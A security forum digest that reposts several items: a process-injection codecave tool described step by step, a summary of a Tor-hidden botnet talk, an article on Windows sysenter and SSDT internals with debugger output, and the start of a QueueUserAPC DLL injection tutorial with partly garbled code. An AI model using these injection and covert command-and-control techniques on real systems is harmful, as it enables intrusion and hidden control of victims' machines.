http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3889 Sursa: [Kernel Hack] Hooking SeSinglePrivilegeCheck to bypass privilege checks - rohitab.com - Forums

[h=1]Calling ShellExecute in codecave[/h][h=3]zwclose7[/h]This program inject a codecave that call ShellExecute function to run executable files or open websites into another process. 1) Parse the PID and file name from command line. 2) Enable SeDebugPrivilege using RtlAdjustPrivilege function. 3) Open the target process handle using NtOpenProcess function. 4) Allocate memory in the target process using VirtualAllocEx function. 5) Write the codecave into the target process using NtWriteVirtualMemory function. 6) Create a remote thread in the target process to execute the codecave using RtlCreateUserThread function. 7) Wait for the remote thread to terminate. 8) The codecave call LoadLibrary function to load shell32.dll, and then call GetProcAddress function to get the address of the ShellExecute function. 9) The codecave call ShellExecute function to run the executable file or open a new website. 10) After ShellExecute returns, the codecave call FreeLibrary function to unload shell32.dll. 11) After FreeLibrary returns, the thread terminates. 12) Close the thread handle using NtClose function. 13) Free the allocated memory using VirtualFreeEx function. 14) Close the process handle using NtClose function. 15) Exit Native API functions used: 1) RtlAdjustPrivilege 2) NtOpenProcess 3) NtWriteVirtualMemory 4) RtlCreateUserThread 5) NtWaitForSingleObject 6) NtClose This video show you how the injector works: http://www.youtube.com/watch?v=vQ0FP2uyJHI&feature=player_embedded Download src: http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3887 Sursa: Calling ShellExecute in codecave - rohitab.com - Forums

Tor Based Botnets Description: In this video Suriya Prakash shows us a demo on the TOR Based botnet. It is all about POC of TOR botnet. You will learn how to configure and run the TOR based botnet. Blog :- Tor Based Botnets @Defcon Bangalore (DC9180) | Suriya's Blog Security researchers have uncovered a new breed of botnets which rely on the functionality offered by the Tor (The Onion Router) anonymity network. A few days ago, at the DefCon Bangalore security conference – 17-year-old researcher Suriya Prakash presented his findings on how botnets are starting to rely more and more on Tor to hide their traces. “They work like all other botnets, but are hidden behind the TOR network and run as a hidden service with .onion domains (many sites like WikiLeaks have mirror sites in the TOR network, or search engines like duckduckgo, and many other illegal sites that cannot exist in the public internet),” Suriya told Softpedia. “You can set it up just like a normal web server but bind it to the port from which TOR hidden service is running and hence your botnet will run behind the TOR network and it will not be possible to trace the C&C server,” he added. “The bots themselves should have an instance of TOR (because only computers in the TOR network can communicate with hidden services servers) and will communicate over the TOR network to send data and receive commands from the server.” The expert highlighted the fact that such botnets could not be disrupted such as the classic ones by revoking domains, banning IP addresses or by requesting the host to take down the website. News Source : - Researchers Find Botnet C&C Servers Hidden in Tor Anonymity Network Sursa: Tor Based Botnets

[h=1]The Sysenter Instruction Internals[/h]Dejan Lukan May 16, 2013 Introduction In the previous article we’ve seen that whether we’re using the int 0x2e interrupt or sysenter instruction, the same method in kernel is being used. We also identified that the KiSystemService is being called in both cases. In this article, we’ll take a look at the details of how this actually happens. Whenever we use the 0x2e interrupt or a sysenter instruction, the system service number is being used to determine which system call will be invoked. We’ve already seen that the system service number is being passed in an EAX register, which is a 32-bit register on IA-32 machines. However, it isn’t immediately clear how that value is later being used. The first thing that comes to mind is that it’s just an index into some table, which holds the pointers to system routines that will be invoked. This is pretty close to how the value is actually being used, but we should probably mention that 32-bits are not used as an index, because we would have to have a 4GB-big table of pointers or a multiple level table, which is impractical and isn’t needed. The system service number is comprised of the following parts: bits 0-11: the number of the system service to call bits 12-13: used service descriptor table bits 14-31: not used We can see that only the lower 12-bits are used as an index into the table, which is 4096 bytes in size. But there are also 2 bits (from 12-13) that are used to select the appropriate service descriptor table, which means that we can have at most 4 service descriptor tables. In Windows, the SSDT (System Service Dispatch Table) is a table that points to kernel functions that are handled in ntoskrnl.exe. The ntoskrnl.exe is responsible for various tasks, like hardware virtualization, process and memory management, cache managing, process scheduling, etc. [5] In Windows systems, only two tables are used and they are named KeServiceDescriptorTable and KeServiceDescriptorTableShadow. On the picture below, we can see the address and the first element of both tables in memory. Both of these tables contain SST (System Service Tables) structures that have the following elements (summarized from [4]): ServiceTable: pointer to the SSDT array of addresses that point to kernel functions CounterTable: not used ServiceLimit: number of elements in SSDT array ArgumentTable: pointer to the array of arguments SSPT (System Service Parameter Table) The picture below shows the structures of SSTs in both tables: On the picture above, we can see the first SST of the KeServiceDescriptorTable, which is 16 bytes long. This is the SST that points to the SSDT that contains the Windows core functions. The values of the SST are as follows: ServiceTable: 80501b8c (pointer to KiServiceTable) CounterTable: not used ServiceLimit: 0x11c (hex) = 286 (dec) ArgumentTable: 80502000 (pointer to KiArgumentTable) The KeServiceDescriptorTableShadow contains two SSTs which occupy the first 32 bytes. We can see that the first SST is the same as the one present in the KeServiceDescriptorTable table, while the second is used to point to the functions in the win32k.sys kernel driver, which takes care of Windows graphical user interface. Let’s present the fields of this SST: ServiceTable: bf99e900 (pointer to W32pServiceTable) CounterTable: not used ServiceLimit: 0x29b (hex) = 667 (dec) ArgumentTable: bf99f610 (pointer to W32pArgumentTable) Let’s summarize what we’ve just done. The KeServiceDescriptorTable table is referenced if the 12-13 bits in the system service number is set to 0×00, while the KeServiceDescriptorTableShadow is referenced if the 12-13 bits are set to 0×01. The other two values 0×10 and 0×11 are currently not being used. This means that the value in the EAX register, which is the system service number, can hold the following values (presenting the 16-bit values): 0000xxxx xxxxxxxx: used by KeServiceDescriptorTable, where the x’s can be 0 or 1, which further implies that the first table is used if the system service numbers are from 0×0 – 0xFFF. 0001yyyy yyyyyyyy: used by KeServiceDescriptorTableShadow, where y’s can be 0 or 1, which further implies that the second table is used if the system service numbers are from 0×1000 – 0x1FFF. This means that the system service numbers in EAX register can only be in the range of 0×0000 – 0x1FFFF, and all other values are invalid. To dump the Windows core functions from the KiServiceTable table, we can use the Windbg “dps KiServiceTable” command as follows (note that only the first part of the functions is presented): Let’s also dump the first part of the functions contained in the W32pServiceTable table. This can be seen below, where we used the “dps W32pServiceTable” command to display the functions: Did you notice that the KiServiceTable contains core Windows functions, while the W32pServiceTable table contains the graphical functions as we already mentioned? The above outputs confirm that. Presenting the Example Below we can see the example we’ll be using in this part of the article. The example is simply calling the ZwQuerySystemInformation function directly from the ntdll.dll library. We can’t call the function directly, which is why we must first load the ntdll.dll library and then get the address of the ZwQuerySystemInformation function. We get back the address in memory where the function is located, so we must apply the function prototype in order to be able to call the function. What the program actually does is detect whether the system debugger is currently debugging the operating system or not. #include "stdafx.h" #include <stdio.h> #include <windows.h> #include <Winternl.h> int _tmain(int argc, _TCHAR* argv[]) { __asm { int 3 } typedef long NTSTATUS; #define STATUS_SUCCESS ((NTSTATUS)0L) HANDLE hProcess = GetCurrentProcess(); typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION { BOOLEAN DebuggerEnabled; BOOLEAN DebuggerNotPresent; } SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION; enum SYSTEM_INFORMATION_CLASS { SystemKernelDebuggerInformation = 35 }; typedef NTSTATUS (__stdcall *ZW_QUERY_SYSTEM_INFORMATION)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength); ZW_QUERY_SYSTEM_INFORMATION ZwQuerySystemInformation; SYSTEM_KERNEL_DEBUGGER_INFORMATION Info; /* load the ntdll.dll */ HMODULE hModule = LoadLibrary(_T("ntdll.dll")); ZwQuerySystemInformation = (ZW_QUERY_SYSTEM_INFORMATION)GetProcAddress(hModule, "ZwQuerySystemInformation"); if(ZwQuerySystemInformation == NULL) { printf("Error: could not find the function ZwQuerySystemInformation in library ntdll.dll."); exit(-1); } printf("ZwQuerySystemInformation is located at 0x%08x in ntdll.dll.\n", (unsigned int)ZwQuerySystemInformation); if (STATUS_SUCCESS == ZwQuerySystemInformation(SystemKernelDebuggerInformation, &Info, sizeof(Info), NULL)) { if (Info.DebuggerEnabled && !Info.DebuggerNotPresent) { printf("System debugger is present."); } else { printf("System debugger is not present."); } } /* wait */ getchar(); return 0; } While running the program under Windbg kernel debugger, we’ll be presented with the following output from the program: We can see that the program correctly identified that the system debugger is present. The picture below presents the disassembled instruction of the ZwQuerySystemInformation function: We can see that the ZwQuerySystemInformation function implementation in ntdll.dll library is just a routine that calls into the kernel and doesn’t actually provide the service itself. In the code above, we’re storing the 0xAD hexadecimal number into the EAX register, the system service number we’ve been talking about in the article. Since the 0xAD number is in range of 0×000-0xFFF, we’re effectively using the KeServiceDescriptorTable table to get all the information that we need to call the kernel function. Let’s first take a look at the address that is loaded into the EDX register: VIEW RCE COURSE In the code above, we’re reading the address 0x7c90e510 at the memory of the EDX register and calling it. The 0x7c90e510 address is the address of the KiFastSystemCall function as we can see in the output below: The KiFastSystemCall is executing the sysenter instruction, which should call the appropriate system function in the kernel. We already know that when we execute the sysenter instruction, the KiFastCallEntry function is called, which is why we need to set a breakpoint on that function as follows: After that we can run the program with the g command and the function will be hit as shown below: Let’s disassemble the whole KiFastCallEntry function to figure out what the function does. The disassembled instructions can be seen below: kd> u KiFastCallEntry l100 nt!KiFastCallEntry: 8053d600 b923000000 mov ecx,23h 8053d605 6a30 push 30h 8053d607 0fa1 pop fs 8053d609 8ed9 mov ds,cx 8053d60b 8ec1 mov es,cx 8053d60d 8b0d40f0dfff mov ecx,dword ptr ds:[0FFDFF040h] 8053d613 8b6104 mov esp,dword ptr [ecx+4] 8053d616 6a23 push 23h 8053d618 52 push edx 8053d619 9c pushfd 8053d61a 6a02 push 2 8053d61c 83c208 add edx,8 8053d61f 9d popfd 8053d620 804c240102 or byte ptr [esp+1],2 8053d625 6a1b push 1Bh 8053d627 ff350403dfff push dword ptr ds:[0FFDF0304h] 8053d62d 6a00 push 0 8053d62f 55 push ebp 8053d630 53 push ebx 8053d631 56 push esi 8053d632 57 push edi 8053d633 8b1d1cf0dfff mov ebx,dword ptr ds:[0FFDFF01Ch] 8053d639 6a3b push 3Bh 8053d63b 8bb324010000 mov esi,dword ptr [ebx+124h] 8053d641 ff33 push dword ptr [ebx] 8053d643 c703ffffffff mov dword ptr [ebx],0FFFFFFFFh 8053d649 8b6e18 mov ebp,dword ptr [esi+18h] 8053d64c 6a01 push 1 8053d64e 83ec48 sub esp,48h 8053d651 81ed9c020000 sub ebp,29Ch 8053d657 c6864001000001 mov byte ptr [esi+140h],1 8053d65e 3bec cmp ebp,esp 8053d660 759a jne nt!KiFastCallEntry2+0x47 (8053d5fc) 8053d662 83652c00 and dword ptr [ebp+2Ch],0 8053d666 462cff test byte ptr [esi+2Ch],0FFh 8053d66a 89ae34010000 mov dword ptr [esi+134h],ebp 8053d670 0f854afeffff jne nt!Dr_FastCallDrSave (8053d4c0) 8053d676 8b5d60 mov ebx,dword ptr [ebp+60h] 8053d679 8b7d68 mov edi,dword ptr [ebp+68h] 8053d67c 89550c mov dword ptr [ebp+0Ch],edx 8053d67f c74508000ddbba mov dword ptr [ebp+8],0BADB0D00h 8053d686 895d00 mov dword ptr [ebp],ebx 8053d689 897d04 mov dword ptr [ebp+4],edi 8053d68c fb sti 8053d68d 8bf8 mov edi,eax 8053d68f c1ef08 shr edi,8 8053d692 83e730 and edi,30h 8053d695 8bcf mov ecx,edi 8053d697 03bee0000000 add edi,dword ptr [esi+0E0h] 8053d69d 8bd8 mov ebx,eax 8053d69f 25ff0f0000 and eax,0FFFh 8053d6a4 3b4708 cmp eax,dword ptr [edi+8] 8053d6a7 0f8345fdffff jae nt!KiBBTUnexpectedRange (8053d3f2) 8053d6ad 83f910 cmp ecx,10h 8053d6b0 751a jne nt!KiFastCallEntry+0xcc (8053d6cc) 8053d6b2 8b0d18f0dfff mov ecx,dword ptr ds:[0FFDFF018h] 8053d6b8 33db xor ebx,ebx 8053d6ba 0b99700f0000 or ebx,dword ptr [ecx+0F70h] 8053d6c0 740a je nt!KiFastCallEntry+0xcc (8053d6cc) 8053d6c2 52 push edx 8053d6c3 50 push eax 8053d6c4 ff15e4305580 call dword ptr [nt!KeGdiFlushUserBatch (805530e4)] 8053d6ca 58 pop eax 8053d6cb 5a pop edx 8053d6cc ff0538f6dfff inc dword ptr ds:[0FFDFF638h] 8053d6d2 8bf2 mov esi,edx 8053d6d4 8b5f0c mov ebx,dword ptr [edi+0Ch] 8053d6d7 33c9 xor ecx,ecx 8053d6d9 8a0c18 mov cl,byte ptr [eax+ebx] 8053d6dc 8b3f mov edi,dword ptr [edi] 8053d6de 8b1c87 mov ebx,dword ptr [edi+eax*4] 8053d6e1 2be1 sub esp,ecx 8053d6e3 c1e902 shr ecx,2 8053d6e6 8bfc mov edi,esp 8053d6e8 3b35d48a5580 cmp esi,dword ptr [nt!MmUserProbeAddress (80558ad4)] 8053d6ee 0f83a8010000 jae nt!KiSystemCallExit2+0x9f (8053d89c) 8053d6f4 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] 8053d6f6 ffd3 call ebx 8053d6f8 8be5 mov esp,ebp 8053d6fa 8b0d24f1dfff mov ecx,dword ptr ds:[0FFDFF124h] 8053d700 8b553c mov edx,dword ptr [ebp+3Ch] 8053d703 899134010000 mov dword ptr [ecx+134h],edx Let’s take a look at the first instruction in the KiFastCallEntry function where the value in register EAX is being used, which means that the system service number is being used to do something. Those instructions can be seen below: 8053d68d 8bf8 mov edi,eax 8053d68f c1ef08 shr edi,8 8053d692 83e730 and edi,30h 8053d695 8bcf mov ecx,edi At first, those instructions may seem weird, but they soon start to make a lot of sense. All of the operations can be seen on the picture below. We start with a whole system service number that is stored in the EAX register and then moved to the EDI register. This can be seen on the first part of the picture where the lower 12 bits is the actual system service number and the middle two bits determine the SSDT table to be used, while the upper 18 bits are not used. The shr instruction moves all the bits in the EDI register to the right by 8. This is seen on the middle part of the picture where the lower 4 bits are used to represent the now-corrupted system service number, and the middle two bits are still the SSDT number. The upper 26 bits are not used. The next and instruction nulls the lower four bits, thus leaving only the middle two bits unaltered. At the end of the above code, the SSDT number is stored in the 4-5 bit of the ECX register. Since we’re passing the system service number 0xAD in the EAX register, we should really set a conditional breakpoint in WinDbg, because otherwise we won’t be able to manage the execution the way we want. This is because the KiFastCallEntry function is called so many times by the kernel itself that it doesn’t make sense to manually check whether the EAX register contains the right system service number. We should set the conditional breakpoint on the 0x8053d68d address and check whether the value in the EAX register is 0xAD (our system service number). We can set the conditional breakpoint like this: kd> bp 8053d68d "j @eax = 0x000000ad '';'gc'" kd> bl 0 e 8053d68d 0001 (0001) nt!KiFastCallEntry+0x8d "j @eax = 0x000000ad '';'gc'" After that we should start the program normally and observe what happens. The execution should take considerably more time, since WinDbg must compare the value in the EAX register every time it passed that code point, which happens a lot. Let’s take a look at an example at a point where it hits the breakpoint, which means that the value in the EAX register should be set to 0xAD: kd> g nt!KiFastCallEntry+0x8d: 8053d6dd 8bf8 mov edi,eax kd> r eax, ecx, edi eax=000000ad ecx=80042000 edi=7c90e514 kd> p nt!KiFastCallEntry+0x8f: 8053d6df c1ef08 shr edi,8 kd> r eax, ecx, edi eax=000000ad ecx=80042000 edi=000000ad kd> p nt!KiFastCallEntry+0x92: 8053d6e2 83e730 and edi,30h kd> r eax, ecx, edi eax=000000ad ecx=80042000 edi=00000000 kd> p nt!KiFastCallEntry+0x95: 8053d6e5 8bcf mov ecx,edi The first number in EAX register is 0xad (10101101), which we’re shifting to the right for 8 bits. This makes a number 0×0, which is then later AND-ed with the 0×30. The transformations result in the number 0×000000. Since we’ve just calculated the value stored in the ECX register, it’s advisable that we continue the code observation by looking at the instructions that use the value in the ECX register. We won’t do that now since the article might get too long, but you get the picture. Conclusion In this article we’ve seen the internals of what happens when the sysenter instruction is called. We could go a lot deeper, but I didn’t want to make the article too long. The most important things to remember are how the system service number is calculated and how the service is called. References: [1] Shifting yourself to space, accessible at sysenter | Shifting yourself to space. [2] Manual inspection of service dispatch table (SSDT) for hook detection, accessible at DDK / Windbg / IDA Pro: Manual inspection of service dispatch table (SSDT) for hook detection. [3] Hunting rootkits with Windbg, accessible at www.reconstructer.org/…/Hunting%20rootkits%20with%20Windbg.pdf. [4] BlackEnergy Version 2 Rootkit Analysis – SecuraBit, accessible at www.securabit.com/wp…/Rootkit-Analysis-Hiding-SSDT-Hooks1.pdf. [5] ntoskrnl.exe, accessible at ntoskrnl.exe - Wikipedia, the free encyclopedia. Sursa: InfoSec Institute Resources – The Sysenter Instruction Internals

[h=1]Code Injection Techniques[/h]ViperEye May 02, 2013 DLL Injection using QueueUserAPC We begin by creating a process using CreateProcess, which is the where we are trying to inject the code into: PROCESS_INFORMATION pi; STARTUPINFOA Startup; ZeroMemory(&Startup, sizeof(Startup)); ZeroMemory(?, sizeof(pi)); CreateProcessA("C:\\Windows\\notepad.exe" NULL, NULL, NULL, NULL, CREATE_SUSPENDED, NULL, NULL, &Startup, ?); Once the process is created, OpenProcess is called with the following arguments: OpenProcess(PROCESS_ALL_ACCESS,FALSE, /*ProcessId*/ 348); [TABLE] [TR] [TD=class: gutter][/TD] [TD=class: code][/TD] [/TR] [/TABLE] Once the process is opened with all access, memory can be allocated to it using VirtualAllocEx(). ARTICOL COMPLET: http://resources.infosecinstitute.com/code-injection-techniques/